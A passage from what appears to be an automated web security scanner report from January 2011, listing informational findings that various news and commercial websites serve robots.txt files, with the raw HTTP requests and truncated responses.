Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "74cb8de98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:56:40 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.80. http://toddkenreck.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://toddkenreck.newsvine.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toddkenreck.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:57:53 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=d5a3adb258afdc4a1c6ae1e727ff7f15; expires=Sat, 25-Jan-2031 02:57:53 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:57:53 GMT
Content-Length: 251
Keep-Alive: timeout=3, max=1000
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://toddke
...[SNIP]...

29.81. http://top.newsvine.com/users previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://top.newsvine.com
Path:	/users

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: top.newsvine.com

Response

29.82. http://trueslant.com/milesobrien/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trueslant.com
Path:	/milesobrien/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: trueslant.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:01:18 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch
Last-Modified: Wed, 15 Jul 2009 22:03:04 GMT
ETag: "6cc614-150-46ec5b826b600"
Accept-Ranges: bytes
Content-Length: 336
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: TSSESSID=ts-www6; path=/

sitemap: http://trueslant.com/sitemap.xml
User-agent: *
Allow: /
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes

User-agent: Mediapartners-Google
Allow: /

User-agent: Adsbot-Google
All
...[SNIP]...

29.83. http://tv.msnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.msnbc.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tv.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "74cb8de98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 03:01:32 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.84. https://twitter.com/ToddKenreck previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/ToddKenreck

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:03:17 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1296356597186309; path=/; expires=Sun, 06-Feb-11 03:03:17 GMT; domain=.twitter.com
Last-Modified: Sat, 29 Jan 2011 02:26:54 GMT
Accept-Ranges: bytes
Content-Length: 489
Cache-Control: max-age=86400
Expires: Mon, 31 Jan 2011 03:03:17 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/plain; charset=UTF-8

#Google Search Engine Robot
User-agent: Googlebot
# Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl
Disallow: /*?
Disallow: /*/with_friends

#Yahoo! Search Engine Robot
User-Agent: Slurp
Crawl-de
...[SNIP]...

29.85. http://wbenedetti.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wbenedetti.newsvine.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wbenedetti.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:05:15 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=0da504898b08190fdbac0d27b1a3e796; expires=Sat, 25-Jan-2031 03:05:15 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 03:05:15 GMT
Content-Length: 250
Keep-Alive: timeout=3, max=997
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://wbened
...[SNIP]...

29.86. http://webreflection.blogspot.com/2007/08/global-scope-evaluation-and-dom.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webreflection.blogspot.com
Path:	/2007/08/global-scope-evaluation-and-dom.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: webreflection.blogspot.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Expires: Sun, 30 Jan 2011 01:51:56 GMT
Date: Sun, 30 Jan 2011 01:51:56 GMT
Last-Modified: Sat, 29 Jan 2011 16:51:37 GMT
ETag: "68641a2f-a995-496b-a3b0-3a35d5667c34"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /search

Sitemap: http://webreflection.blogspot.com/feeds/posts/default?orderby=updated

29.87. http://widgets.digg.com/buttons.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.digg.com
Path:	/buttons.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: widgets.digg.com

Response

HTTP/1.1 200 OK
Age: 0
Date: Sun, 30 Jan 2011 01:52:04 GMT
Via: NS-CACHE: 100
Server: Apache
Last-Modified: Sun, 27 Jul 2008 09:42:54 GMT
Accept-Ranges: bytes
X-Digg-Time: D=291 (null)
Content-Type: text/plain; charset=UTF-8
Cache-Control: private, max-age=86399
Expires: Mon, 31 Jan 2011 01:52:03 GMT
X-CDN: Cotendo
Connection: close

User-agent: *
Disallow: /

29.88. http://www.adobe.com/cfusion/knowledgebase/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/cfusion/knowledgebase/index.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 28 Jan 2011 21:45:16 GMT
ETag: "501-fb4f1300"
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Sat, 29 Jan 2011 22:41:08 GMT
Content-Type: text/plain
Connection: close
Date: Sun, 30 Jan 2011 01:52:12 GMT
Age: 249
Content-Length: 1281

#
# This file is used to allow crawlers to index our site.
#
# List of all web robots: http://www.robotstxt.org/wc/active/html/index.html
#
# Check robots.txt at:
# http://www.searchengineworld.com/c
...[SNIP]...

29.89. http://www.amazon.com/gp/product/1935182374 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/gp/product/1935182374

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amazon.com

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:30:31 GMT
Server: Server
Last-Modified: Thu, 23 Sep 2010 18:50:15 GMT
ETag: "7c0-bb8de7c0"
Accept-Ranges: bytes
Content-Length: 1984
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Connection: close

# Disallow all crawlers access to certain pages.

User-agent: *
Disallow: /exec/obidos/account-access-login
Disallow: /exec/obidos/change-style
Disallow: /exec/obidos/flex-sign-in
Disallow: /exec/obid
...[SNIP]...

29.90. http://www.batstrading.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.batstrading.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.batstrading.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 18 Aug 2009 12:52:05 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 144
Date: Sun, 30 Jan 2011 01:52:16 GMT
Age: 0
Connection: close
X-BATS: 1112151768

User-agent: twiceler
Disallow: /

User-agent: *
Disallow:
Disallow: /_cache/
Disallow: /_css/
Disallow: /_img/
Disallow: /_js/
Disallow: /book/

29.91. http://www.briefing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.briefing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.briefing.com

Response

HTTP/1.1 200 OK
Content-Length: 205
Content-Type: text/plain
Last-Modified: Thu, 15 Feb 2007 01:33:46 GMT
Accept-Ranges: bytes
ETag: "a0662b56a150c71:45"
Server: Briefing Content Server
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:52:26 GMT
Connection: close

User-agent: *
Disallow: /aspnet_client
Disallow: /Benchmark
Disallow: /ErrorPages
Disallow: /Gold
Disallow: /images
Disallow: /Platinum
Disallow: /Silver
Disallow: /Trader
Disallow: /wpresour
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dabagirls.com
Path:	/\|http:/www.stylemepretty.com/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.redacted\|msn.com/wonderwall\|v14.msn.com/\|preview.redacted/\|www.redacted/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dabagirls.com

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 01:52:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Cookie
X-Pingback: http://www.dabagirls.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

29.93. http://www.dailygrail.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailygrail.com
Path:	/

Request

GET /robots.txt HTTP/1.0
Host: www.fashioncocktail.com

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web028
X-Webserver: oak-tp-web028
Vary: cookie
Keep-Alive: timeout=300, max=100
Content-Type: text/plain; charset=utf-8
Content-Length: 341
Date: Sun, 30 Jan 2011 01:53:02 GMT
X-Varnish: 2957496589
Age: 0
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /t/trackback
Disallow: /t/comments
Disallow: /t/stats
Disallow: /t/app
Disallow: /.m/

User-agent: Googlebot-Mobile
Disallow: /
Allow: /.m/

User-agent: Y!J-SRD
Disallow: /
All
...[SNIP]...

29.96. http://www.ftc.gov/ogc/coppa1.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ftc.gov
Path:	/ogc/coppa1.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ftc.gov

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:14 GMT
Server: Apache
Last-Modified: Wed, 18 Jul 2007 16:06:19 GMT
ETag: "945158-40-4358bdfd754c0"
Accept-Ranges: bytes
Content-Length: 64
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# robots.txt for http://www.ftc.gov/
#
User-agent: *
Disallow:

29.97. http://www.googleadservices.com/pagead/conversion.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 17 Jan 2011 07:39:39 GMT
Date: Sun, 30 Jan 2011 01:53:36 GMT
Expires: Sun, 30 Jan 2011 01:53:36 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.98. http://www.habitablezone.com/space/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.habitablezone.com
Path:	/space/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.habitablezone.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:06:10 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sun, 25 Oct 2009 03:29:46 GMT
ETag: "187e9-8e1-476ba0e7e5e80"
Accept-Ranges: bytes
Content-Length: 2273
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# for an installation in a subdirectory, you have to copy this file in your root of your domain and add /subdir/ on each line
User-agent: *
Crawl-Delay: 30
Disallow: /CVS/
Disallow: /lib/
Disallow: /
...[SNIP]...

29.99. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hoovers.com
Path:	/business-information/--pageid__13823--/global-mktg-index.xhtml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hoovers.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:37 GMT
Server: Apache
Last-Modified: Wed, 14 Jul 2010 18:11:37 GMT
ETag: "488"
Accept-Ranges: bytes
Content-Length: 1160
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Set-Cookie: HID=173.193.214.243.1296352417437192; path=/; expires=Fri, 29-Jan-16 01:53:37 GMT; domain=.hoovers.com
Set-Cookie: BIGipServerhaspriv-colo1=217829898.20480.0000; path=/
P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE"
Connection: close
Set-Cookie: BIGipServerwww-1=1341968906.20480.0000; path=/

# robots.txt for Hoover's Online http://www.hoovers.com/
# For information about Hoover's Online please contact
# webadmin@hoovers.com
#

User-agent: *
Disallow: /cgi-bin/ # Need to provide paramete
...[SNIP]...

29.100. http://www.interactivedata-rts.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.interactivedata-rts.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.interactivedata-rts.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:39 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 02 Jul 2009 15:27:11 GMT
ETag: "1586a1-1a-46dbaac6cd1c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

#User-agent: *
#Disallow:

29.101. http://www.live.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.live.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.live.com

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=345600
Content-Type: text/plain; charset=utf-8
Expires: Wed, 02 Feb 2011 23:13:40 GMT
Vary: *
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: xid=4967caa6-1a3f-4f7c-840f-7c231b9ef9bf&&BL2xxxxxxC502&61; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=821848180&U=&E=&P=&B=; domain=.live.com; path=/
Set-Cookie: mkt1=norm=; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.www.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:33:40 GMT; path=/
Set-Cookie: E=P:URLzTCGOzYg=:6a/86DyJHtrjSXfYrSFgu4EfzbnMP5TrcqQBnh3onTQ=:F; domain=.live.com; path=/
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:13:39 GMT
Connection: close
Content-Length: 23

User-agent: *
Disallow:

29.102. http://www.livescience.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livescience.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livescience.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:05:45 GMT
Server: Apache
Last-Modified: Fri, 24 Dec 2010 16:04:05 GMT
ETag: "39d045b-275-4982a22b24740"
Accept-Ranges: bytes
Content-Length: 629
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /js/
Disallow: /aol/
Disallow: /newsub/
Disallow: /flash/
Disallow: /promo/
Disallow: /template_images/
Disallow: /upload/
Disallow: /php/ads/
Disallow: /php/common/
Disallow:
...[SNIP]...

29.103. http://www.morningstar.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.morningstar.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.morningstar.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
Pragma: no-cache
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: *
Content-Length: 72
Content-Type: text/plain;charset=utf-8
GstreamInfo: S=app102 D=32349 t=1296357234774166
Vary: Accept-Encoding,User-Agent
X-OSO-Fetch-Time: 0
X-OSO-Total-Time: 0.01
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 01:54:04 GMT
Connection: close

# OSO Robots.txt
# Last Updated Oct 12 2010

User-Agent: *
Disallow:

29.104. http://www.msnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "74cb8de98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 03:07:04 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.105. http://www.nasaspaceflight.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nasaspaceflight.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nasaspaceflight.com

Response

HTTP/1.0 200 OK
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.7
Vary: Cookie
Set-Cookie: pixelstats_visitor_id=aee3a15e102dbdd3b62d2eea1e5c1cb6; expires=Tue, 01-Mar-2011 03:12:26 GMT
X-Pingback: http://www.nasaspaceflight.com/xmlrpc.php
Content-Type: text/plain; charset=utf-8
Content-Length: 24
Date: Sun, 30 Jan 2011 03:12:26 GMT
Server: lighttpd/1.4.19

User-agent: *
Disallow:

29.106. https://www.newsvine.com/_nv/api/accounts/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/api/accounts/login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:23:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=aa91a51466599cd3eddf02f9186836c3; expires=Sat, 25-Jan-2031 01:23:07 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 01:23:07 GMT
Content-Length: 227
Keep-Alive: timeout=3, max=984
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://www.ne
...[SNIP]...

29.107. http://www.outofthecradle.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outofthecradle.net
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.outofthecradle.net

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:15:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.outofthecradle.net/WordPress/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

User-agent: *
Disallow:

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pcmag.com
Path:	/category2/0,2806,24,00.asp\|http:/www.pcmag.com/category2/0,2806,9,00.asp\|http:/www.pcmag.com/category2/0,2806,4829,00.asp\|http:/www.pcmag.com/category2/0,2806,2201,00.asp\|office.microsoft.com\|www.healthline.com/$\|http:/www.terra.com.mx/default.htm\|http:/www.terra.com/$\|www.people.com/$\|http:/www.walmart.com/\|http:/www.walmart.com/cp/toys/4171\|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pcmag.com

Response

HTTP/1.0 200 OK
Content-Length: 438
Content-Type: text/plain
Last-Modified: Tue, 30 Nov 2010 20:01:03 GMT
Accept-Ranges: bytes
ETag: "6f123051c990cb1:46c"
Server: Microsoft-IIS/6.0
X-Powered-By: p3
Expires: Sun, 30 Jan 2011 02:01:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 30 Jan 2011 02:01:05 GMT
Connection: close

User-agent: *
Disallow: /products
Disallow: /products/
Disallow: /search_redirect
Disallow: /search_redirect/
Disallow: /search_results
Disallow: /search_results/
Disallow: /search
Disallow: /
...[SNIP]...

29.109. http://www.polls.newsvine.com/_vine/js/pierre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_vine/js/pierre

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.polls.newsvine.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 227
Content-Type: text/plain
Cache-Control: max-age=300
Expires: Sun, 30 Jan 2011 01:28:01 GMT
Date: Sun, 30 Jan 2011 01:23:01 GMT
Connection: close

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://www.ne
...[SNIP]...

29.110. http://www.popsci.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.popsci.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.popsci.com

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:18:23 GMT
Server: Apache
Last-Modified: Thu, 27 May 2010 16:20:18 GMT
Accept-Ranges: bytes
Content-Length: 1980
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 03:18:23 GMT
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4b D=1443
Connection: close
Content-Type: text/plain
Content-Language: en

# $Id: robots.txt,v 1.2 2008-10-13 19:21:48 ilatorre Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

29.111. http://www.popularmechanics.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.popularmechanics.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.popularmechanics.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 682
Content-Type: text/plain
Cache-Control: max-age=560
Date: Sun, 30 Jan 2011 03:18:24 GMT
Connection: close

User-agent: *
Crawl-delay: 20
Disallow: /ams/
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /contribute/
Disallow: /comments/
Disallow: /registration/
Disallo
...[SNIP]...

29.112. http://www.reuters.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:03:18 GMT
Server: Apache
Expires: Sun, 30 Jan 2011 01:59:15 GMT
Content-Length: 197
Age: 242
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Set-Cookie: SSLBI=A;path=/;domain=www.reuters.com;
RTSS: 1
Connection: close

User-agent: *
Disallow: /finance/stocks/option
Disallow: /finance/stocks/financialHighlights
Disallow: /search
SITEMAP: http://www.reuters.com/sitemap_news_index.xml

User-agent: Pipl
Disallow: /

29.113. http://www.scidev.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scidev.net
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scidev.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 Nov 2009 17:26:44 GMT
Accept-Ranges: bytes
ETag: "eefc55253d5eca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 03:18:43 GMT
Connection: close
Content-Length: 55

User-agent: *
Disallow: /uploads/*
Disallow: /admin/*

29.114. http://www.scienceblog.com/cms/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scienceblog.com
Path:	/cms/index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scienceblog.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:18:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 02 May 2010 02:29:31 GMT
ETag: "7f-485933f07b8c0"
Accept-Ranges: bytes
Content-Length: 127
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Sun, 30 Jan 2011 04:18:58 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

# robots.txt generated at http://www.mcanerin.com
User-agent: *
Crawl-delay: 10
Disallow: /cgi-bin/
Disallow: /boost_stats.php

29.115. http://www.scientificamerican.com/blog/observations/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scientificamerican.com
Path:	/blog/observations/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scientificamerican.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 10 Nov 2010 01:05:11 GMT
ETag: "89c91d-882-494a872f63fc0"
Content-Type: text/plain; charset=UTF-8
Content-Length: 2178
Date: Sun, 30 Jan 2011 03:19:03 GMT
X-Varnish: 1915411453 1915403387
Age: 353
Via: 1.1 varnish
Connection: close

User-Agent: *
Disallow: /pressroom/view/
Disallow: /earth3/
Disallow: /adops/
Disallow: /reviews/
Disallow: /recommendations/
Disallow: /cds
Disallow: /ad-sections/
Disallow: /books/
Disallow
...[SNIP]...

29.116. http://www.scout.com/webproxy.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/webproxy.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://www.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:ef7"
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:25:49 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.117. http://www.signonsandiego.com/news/blogs/science-quest/ previous next

Summary

Severity:	Information
